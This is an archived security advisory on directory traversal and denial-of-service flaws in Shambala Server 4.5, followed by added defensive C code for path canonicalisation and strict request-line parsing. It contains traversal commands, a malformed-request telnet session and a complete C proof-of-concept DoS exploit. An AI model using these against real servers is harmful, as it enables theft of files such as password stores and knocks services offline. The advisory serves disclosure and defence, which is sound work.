COMMAND

    Shambala Server directory traversal and DoS

SYSTEMS AFFECTED

    Shambala Server 4.5

PROBLEM

    excE @ Telhack 026 Inc [http://www.telhack.tk] found the following.
    Shambala Server is a personal Web/FTP server for Win 9*/NT. When the
    web server is started it also starts the integrated FTP server. Two
    previous issues were disclosed on bugtraq by zillion in 2000, but he
    seems to have missed these. The integrated FTP server is vulnerable
    to a directory traversal attack that lets an attacker list the entire
    directory structure and download any file in it. There is also a DoS
    condition in the web server.

    Impact
    ======
    An authenticated user may view any directory and/or download any file
    on the system. An authenticated user may use this to download the
    !_cleartext_! password file, which lies one ".." below the web root.
    I have also found a DoS condition in the web server that generates
    "Run-time error '5': Invalid procedure call or argument" and crashes
    the server. According to www.download.com the program has been
    downloaded 57,957 times, 40 of them last week, so it still seems to
    be in use.

    Exploits
    ========

    Directory traversal / get any file
    ----------------------------------

        ftp> ls ../../../     - and so on...
        ftp> get ../../../    - and so on...

    DoS condition in the Web server
    -------------------------------

        you# telnet 192.168.0.11 80
        Trying 192.168.0.11...
        Connected to 192.168.0.11.
        Escape character is '^]'.
        GET !"#¤%&/()=?

        Connection closed by foreign host.
        you#

    Update (10 July 2002)
    =====================
    Daniel Nyström (excE) [exce@netwinder.nu]

    DoS exploit:

    /******** shambalax.c *********************************************************
     *
     * PoC exploit for the DoS in Shambala Server 4.5
     * as described in Telhack 026 Inc. S.A. #3 (BID:4897).
     * I have also built in a function that exploits another
     * DoS condition found by zillion a long long time ago.
     * Also refined my DoS a little bit by just using one
     * char that messes up Shambala.
     *
     * By: Daniel Nyström (excE) <exce@netwinder.nu>
     *
     * Notes:
     * I found that zillion had only been almost right, it
     * is not opening a lot of TCP connections that generates
     * the DoS that he found, it is just one TCP connection,
     * but it certainly has to do with bad connection handling
     * by Shambala.
     *
     * Credits:
     * Zillion <zillion@safemode.org> - for discovering the FTP DoS
     *
     * Greetz:
     * Xenogen <*****@**********.***> - for promising to report any segfaults :)
     * X-Rewt <*****@**********.***> - Cuz he's in my school :P
     * Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))
     *
     *********************************************************** shambalax.c ********/

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <strings.h>        /* bzero() */
    #include <unistd.h>         /* close() */
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>      /* inet_ntoa() */
    #include <netdb.h>
    #include <sys/socket.h>

    int main(int argc, char *argv[])
    {
        int sockfd;
        int port;
        struct sockaddr_in target;
        struct hostent *he;

        if (argc != 3) {
            fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");
            fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);
            fprintf(stderr, "\nTypes:");
            fprintf(stderr, "\n1 - HTTPD DoS");
            fprintf(stderr, "\n2 - FTP DoS\n\n");
            exit(1);
        }

        printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");
        printf("-> Starting...\n");
        printf("->\n");

        if ((he = gethostbyname(argv[1])) == NULL) {
            herror("gethostbyname");
            exit(1);
        }

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket");
            exit(1);
        }

        /* HTTPD DoS: a single malformed request line is enough */
        if (argv[2][0] == '1') {
            port = 80;
            target.sin_family = AF_INET;
            target.sin_port = htons(port);
            target.sin_addr = *((struct in_addr *)he->h_addr);
            bzero(&(target.sin_zero), 8);

            printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
            printf("->\n");

            if (connect(sockfd, (struct sockaddr *)&target,
                        sizeof(struct sockaddr)) == -1) {
                perror("connect");
                exit(1);
            }

            printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");
            printf("->\n");

            if (send(sockfd, "!\r\n", 3, 0) == -1) {
                perror("send");
                exit(1);
            }
            close(sockfd);
        }
        /* FTPD DoS: one TCP connect followed by an immediate close */
        else if (argv[2][0] == '2') {
            port = 21;
            target.sin_family = AF_INET;
            target.sin_port = htons(port);
            target.sin_addr = *((struct in_addr *)he->h_addr);
            bzero(&(target.sin_zero), 8);

            printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n",
                   inet_ntoa(target.sin_addr));
            printf("->\n");

            if (connect(sockfd, (struct sockaddr *)&target,
                        sizeof(struct sockaddr)) == -1) {
                perror("connect");
                exit(1);
            }
            close(sockfd);
        }
        else {
            fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
            exit(1);
        }

        printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n",
               argv[1]);
        return 0;
    }

    /* EOF - Shambala Server 4.5 DoS exploit */
    /* Daniel Nyström (excE) <exce@netwinder.nu> */

SOLUTION

    I spent almost 20 minutes digging through the evolvable.com website
    for an e-mail address to contact them, but found none, so I ended up
    taking the e-mail address from another (2 year old) advisory. Still
    no reply. So the fix for now is: uninstall Shambala.
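The traversal above works because the FTP server hands "../../../" to the
filesystem as-is. The fix an FTP server needs is to canonicalise the client
path lexically against a virtual root and refuse anything that climbs above
it, before the path ever reaches the OS. The following is an added example
of that check, not code from the advisory or from Shambala; the names
ftp_canonical_path / ftp_resolve, the virtual-root convention ("/" is the
FTP root, the host directory is prefixed afterwards) and the test inputs are
assumptions made here. Because the target is a Win 9x/NT server, backslashes
are treated as separators too and segments containing ':' (drive letters,
alternate data streams) are refused.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SEGS 64

static int is_sep(char c) { return c == '/' || c == '\\'; }

/* Canonicalise a client-supplied FTP path against the virtual cwd ("/" is the
 * FTP root).  ".." is resolved lexically; an attempt to climb above "/" is
 * refused rather than clamped, and Windows drive/stream syntax is refused.
 * Returns 0 and writes the canonical virtual path to out, or -1 on rejection. */
int ftp_canonical_path(const char *cwd, const char *arg, char *out, size_t outlen)
{
    char buf[1024];
    const char *segs[MAX_SEGS];
    int nsegs = 0, n;
    char *p;

    /* Absolute argument replaces cwd; relative argument is appended to it. */
    n = is_sep(arg[0]) ? snprintf(buf, sizeof buf, "%s", arg)
                       : snprintf(buf, sizeof buf, "%s/%s", cwd, arg);
    if (n < 0 || (size_t)n >= sizeof buf)
        return -1;                         /* truncated: do not guess */

    /* Split on '/' or '\\' in place and process segment by segment. */
    p = buf;
    while (*p) {
        char *seg;
        while (*p && is_sep(*p)) *p++ = '\0';
        if (!*p) break;
        seg = p;
        while (*p && !is_sep(*p)) p++;
        if (*p) *p++ = '\0';

        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            if (nsegs == 0) return -1;     /* would escape the FTP root */
            nsegs--;
            continue;
        }
        if (strchr(seg, ':')) return -1;   /* "C:" or "file::$DATA" on Windows */
        if (nsegs == MAX_SEGS) return -1;
        segs[nsegs++] = seg;
    }

    /* Re-join with '/' so the result is always a clean absolute virtual path. */
    if (nsegs == 0) {
        if (outlen < 2) return -1;
        strcpy(out, "/");
        return 0;
    }
    size_t used = 0;
    for (int i = 0; i < nsegs; i++) {
        n = snprintf(out + used, outlen - used, "/%s", segs[i]);
        if (n < 0 || (size_t)n >= outlen - used) return -1;
        used += (size_t)n;
    }
    return 0;
}

/* Map a client path to a host path: canonicalise first, then prefix the
 * host directory that backs the FTP root.  The prefix is never exposed to
 * ".." processing, so the result cannot leave it. */
int ftp_resolve(const char *host_root, const char *cwd, const char *arg,
                char *out, size_t outlen)
{
    char virt[1024];
    if (ftp_canonical_path(cwd, arg, virt, sizeof virt) != 0) return -1;
    int n = snprintf(out, outlen, "%s%s", host_root, virt);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Test helper: 1 if (cwd, arg) canonicalises to expect, or is rejected when
 * expect is NULL; 0 otherwise. */
int canon_check(const char *cwd, const char *arg, const char *expect)
{
    char out[1024];
    int rc = ftp_canonical_path(cwd, arg, out, sizeof out);
    if (expect == NULL) return rc != 0;
    return rc == 0 && strcmp(out, expect) == 0;
}

int main(void)
{
    /* Constructed inputs: the advisory's traversal and a few Windows twists. */
    const char *probes[] = { "../../../", "..\\..\\boot.ini", "C:/x", "pub/../../" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-20s -> %s\n", probes[i],
               canon_check("/", probes[i], NULL) ? "rejected" : "ACCEPTED");
    return 0;
}
```

A server using this check still has to open the resolved host path without
following symlinks or junctions out of the root, but that is a filesystem
concern; the lexical step is what stops the "ls ../../../" above.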
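The web server DoS is triggered by a request line that does not have the
"METHOD SP URI SP HTTP/x.y" shape, down to a single "!" character. The
advisory does not say which parsing step fails; "Run-time error '5'" is the
Visual Basic error a string function such as Mid or Left raises on an
out-of-range argument, which is consistent with code that assumes the
spaces and the "HTTP/" token are present, but that is an assumption made
here, not a finding from the page. What a server should do instead is
validate the request line against a strict grammar and reject the
connection before any indexing happens. The following strict parser is an
added example, not Shambala's code or the advisory's; the function names
and the test inputs are assumptions, and it deliberately accepts only
abs_path URIs (starting with "/"), not "*" or absolute-URI forms.

```c
#include <ctype.h>
#include <string.h>
#include <stdio.h>

#define MAX_METHOD 16
#define MAX_URI    1024

/* Characters allowed in a request-URI: RFC 2396 unreserved + reserved,
 * plus '%' for escapes and '#' (tolerated).  '"', space and controls are out. */
static int is_uri_char(unsigned char c)
{
    return c != 0 && c < 0x80 &&
           (isalnum(c) || strchr("-_.!~*'();/?:@&=+$,%#", c) != NULL);
}

/* Parse "METHOD SP abs_path SP HTTP/d.d [CRLF]" or the HTTP/0.9 form
 * "GET SP abs_path [CRLF]".  Returns 0 and fills the out-parameters on
 * success, -1 for anything else.  No field is touched on failure paths
 * before it has been fully validated. */
int parse_request_line(const char *line, char *method, size_t mlen,
                       char *uri, size_t ulen, int *major, int *minor)
{
    const char *p = line, *end;
    size_t n;

    /* Method: 1..MAX_METHOD uppercase letters, then exactly one SP. */
    end = p;
    while (*end >= 'A' && *end <= 'Z') end++;
    n = (size_t)(end - p);
    if (n == 0 || n > MAX_METHOD || *end != ' ' || n + 1 > mlen) return -1;
    memcpy(method, p, n);
    method[n] = '\0';
    p = end + 1;

    /* Request-URI: must start with '/', only URI characters, '%' escapes
     * must carry two hex digits. */
    if (*p != '/') return -1;
    end = p;
    while (*end && is_uri_char((unsigned char)*end)) end++;
    n = (size_t)(end - p);
    if (n == 0 || n > MAX_URI || n + 1 > ulen) return -1;
    for (const char *q = p; q < end; q++)
        if (*q == '%' && !(q + 2 < end && isxdigit((unsigned char)q[1])
                                        && isxdigit((unsigned char)q[2])))
            return -1;
    memcpy(uri, p, n);
    uri[n] = '\0';
    p = end;

    /* Version: absent (HTTP/0.9, GET only) or exactly " HTTP/d.d". */
    if (*p == '\r' || *p == '\n' || *p == '\0') {
        if (strcmp(method, "GET") != 0) return -1;
        *major = 0;
        *minor = 9;
    } else {
        if (*p != ' ') return -1;
        p++;
        if (strncmp(p, "HTTP/", 5) != 0) return -1;
        p += 5;
        if (!isdigit((unsigned char)p[0]) || p[1] != '.' ||
            !isdigit((unsigned char)p[2]))
            return -1;
        *major = p[0] - '0';
        *minor = p[2] - '0';
        p += 3;
    }

    /* Only an optional CRLF (or bare LF) may follow. */
    if (*p == '\r') p++;
    if (*p == '\n') p++;
    return *p == '\0' ? 0 : -1;
}

/* Test helpers: does the line parse, and does it parse to these fields? */
int request_line_ok(const char *line)
{
    char m[MAX_METHOD + 1], u[MAX_URI + 1];
    int vmaj, vmin;
    return parse_request_line(line, m, sizeof m, u, sizeof u, &vmaj, &vmin) == 0;
}

int request_line_check(const char *line, const char *exp_method,
                       const char *exp_uri, int exp_major, int exp_minor)
{
    char m[MAX_METHOD + 1], u[MAX_URI + 1];
    int vmaj, vmin;
    if (parse_request_line(line, m, sizeof m, u, sizeof u, &vmaj, &vmin) != 0)
        return 0;
    return strcmp(m, exp_method) == 0 && strcmp(u, exp_uri) == 0 &&
           vmaj == exp_major && vmin == exp_minor;
}

int main(void)
{
    /* Constructed request lines: the advisory's two triggers and a good one. */
    const char *lines[] = { "!\r\n", "GET !\"#%&/()=?\r\n", "GET /index.html HTTP/1.0\r\n" };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%-28s -> %s\n", lines[i], request_line_ok(lines[i]) ? "ok" : "400 Bad Request");
    return 0;
}
```

Note that this parser only checks syntax: "GET /../secret HTTP/1.0" is a
well-formed request line, and confining the path to the document root is a
separate step that belongs after parsing.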